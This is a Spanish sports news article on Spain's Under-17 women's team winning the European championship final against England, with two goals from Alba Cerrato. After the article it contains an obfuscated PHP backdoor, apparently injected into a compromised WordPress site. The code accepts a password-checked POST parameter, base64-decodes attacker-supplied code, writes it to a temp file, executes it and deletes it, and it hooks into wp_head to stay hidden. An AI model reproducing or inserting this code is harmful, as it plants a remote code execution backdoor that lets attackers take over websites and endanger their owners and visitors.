¡Otra vez campeonas de Europa!

La Selección Sub-17 ganó en la gran final a Inglaterra con doblete de Alba Cerrato en otro gran partido de La Rojita. Es su quinto cetro continental.

Y a la tercera fue la vencida. España no tuvo piedad de Inglaterra en la gran final de la Eurocopa Sub-17. La Rojita, que se había quedado a las puertas de su quinto entorchado continental en la categoría los dos años anteriores, no falló en el este. Otra goleada para mantener la hegemonía. Porque España a día de hoy reina en el fútbol femenino mundial e europeo.

Después de dos finales seguidas perdidas, Kenio Gonzalo tenía claro que había que ir a morder desde el primer minuto. Con el mismo once que goleó a Francia, salió en la final ante Inglaterra que, ante el potencial de La Rojita, cambió su esquema y apostó por una defensa de cinco para cerrar espacios y contenter a las centrocampistas españolas. Y lo consiguió en un en inicio en el que España quería el balón, pero ni Ainoa ni Serrajordi conseguían encontrar esos espacios para conectar con las tres de arriba. Y, con espacios, Jones y Fisher buscaban la espalda de las centrales españolas.

Pero ni unas ni otras conseguían hacer daño a su rival. Eran las de Kenio las que más merodeaban la portería de McSherrey. La meta inglesa negó el gol a Ainoa y poco después a Aguirrezabala. Se iba animando La Rojita, que seguía sin encontrar su juego fluido. Pero no lo hizo falta. Porque cuando se acercaba el descanso, Martina cortó un balón largo e inició rápido la transición para que Ainoa encontrase a Segunda en banda que apuró línea de fondo y centró donde apareció Alba Cerrato, más lista que las centrales, para adelantarse a todas y alojar el balón en la red. Un golpe doble porque en el descuento de la primera mitad, Cubo sacó un córner y Cerrato, otra vez, se adelantó a todas para marcar de cabeza su octavo gol en este campeonato.

Tras la reanudación, Inglaterra intentó apretar. Pero España sacó su experiencia para bajar el rimo del partido. Con las inglesas volcadas aparecieron los espacios que La Rojita aprovechó para matar el partido. En el minuto 56 fue Lúa la que apuró hasta línea de fondo y se la puso a Segura, que en el área pequeña, sentenció. La del Barcelona redondeó la goleada con el cuarto de cabeza en el sexta asistencia del campeonato de Serrajordi. Goleada y fiesta. España vuelve a reinar en Europa.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}